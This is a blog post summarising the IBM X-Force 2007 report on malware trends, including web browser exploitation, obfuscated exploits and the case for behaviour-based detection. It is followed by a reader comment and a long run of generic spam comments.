Malware Trend in 2007

I read the report IBM Internet Security System X-Force 2007 Trend
Statistics. This is a report describing trends for various threats in 2007.
This team has been tracking trends since 2000. I found the report
to be quite interesting. In the rest of this post, I highlight some
of the interesting points from the report and what they mean in the
context of malware detection.

(I) The X-Force team reports continued growth in Web browser exploitation. This
clearly shows that the infection vector is changing to the Web. Earlier
the primary infection vectors were email and the network. Therefore,
for detecting malware, drive-by-downloads (DBD) and other threats targeted at hacking through the Web browser need a lot of attention.

(II) X-Force also reports a marked increase in obfuscated exploits, i.e.,
exploits that use various code obfuscation techiques (such as encryption).
Here is a quote, "X-Force estimated that nearly 80 percent of Web exploits
used obfuscation and/or self decryption ... By the end of 2007, X-Force
believed this rate had reached 100 percent, ...". This means that going
forward, Web exploits will increasingly harbor indiscernible code rending signature-based techniques less effective. Advanced
techniques (such as behavior-based detection) are clearly needed to detect
such malware. To exacerbate the situation the X-Force report stated that
there was a 30% increase in new malware samples in 2007 over 2006. This
further drives home the point that signature-based detectors will have trouble
in keeping up with the number of malware as they cannot detect new threats.

(III) There was another very interesting point made by the report. Modern
malware use features from various types of classic malware (such as viruses, worms,
and spyware) by pulling the successful features of each into new strains. To quote the report, "Modern malware is now the digital equivalent
of the Swiss Army knife, and 2007 data continues to support this." This trend
also indicates that the behavior of malware is becoming more sophisticated, which
again supports my claim that detection techniques based on analyzing behavior are
better suited to handle malware of the future. Another interesting tidbit from the
report: "Trojans make up the largest class of malware in 2007 as opposed to downloaders,
which were the largest category in 2006." Recall that a Trojan appears to be a
legitimate file with some hidden functionality (for example, that of a rootkit).
Trojans are historically a problematic class of malware for signature-based
detection.

Overall, I found the report to be very interesting. Read it for yourself.
You can find the report here.

Comments

alice said…
Hey, I am a new comer in security area. I found your blog quite helpful. Keep writing!
I agree that sigunature-based methods are less effective for polymorphism virus. But I am not quite sure how behavior-based detections work. Could you provide some example?
Anonymous said…
你的文章讓我有種特別的感覺,請加油哦~~..................................................
Anonymous said…
TAHNKS FOR YOUR SHARING~~~VERY NICE ........................................
Anonymous said…
TAHNKS FOR YOUR SHARING~~~VERY NICE.................................................
Anonymous said…
看看blog調整心情,又要來繼續工作,大家加油........................................
Anonymous said…
All roads lead to Rome. 堅持自己所選!.............................................
Anonymous said…
天下沒有走不通的路,沒有克服不了的困難,沒有打不敗的敵人。........................................
Anonymous said…
灰心是動搖的開端,動搖是失敗的近鄰。 ..................................................
Anonymous said…
欣賞是一種美德~回應是最大的支持^^.................................................................
Anonymous said…
卡爾.桑得柏:「除非先有夢,否則一切皆不成。」共勉!............................................................
Anonymous said…
閱讀您的BLOG文章,真是件快樂的事!..................................................................
Anonymous said…
脾氣與嘴巴不好,就算心地再好,也不算好人~~~..................................................
Anonymous said…
Riches serve a wise man but command a fool.............................................................
Anonymous said…
知識可以傳授,智慧卻不行。每個人必須成為他自己。. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Anonymous said…
男女互悅,未必廝守終生,相愛就是美的。.................................................................
Anonymous said…
文章雖然普通,但意義卻很大~~^^~~ ..................................................
Anonymous said…
人生中最好的禮物就是屬於自己的一部份..................................................
Anonymous said…
看看文章轉換心情,也幫你加個油哦............................................................
Hollis Strong said…
very nice post..Thanks for sharing this with us. But can you provide some more details aboutInternet Safety?
we are proving Security Guard Companies in Delhi , security guard, Security Services, Security Guard Delhi, Security Guard, Security Guards Delhi, Security Delhi NCR.Our service is better than another
security company.visit at http://www.teamsecurity.in
Ross Taylor said…
Excellent and very interesting article, your blog is very helpful for me. Thanks, to sharing the information about malware trends. It's less effective for polymorphic viruses. Can you provide some more details about Internet Safety? that's more beneficial for me and some other peoples. Market Data

Popular posts from this blog

Web Attacks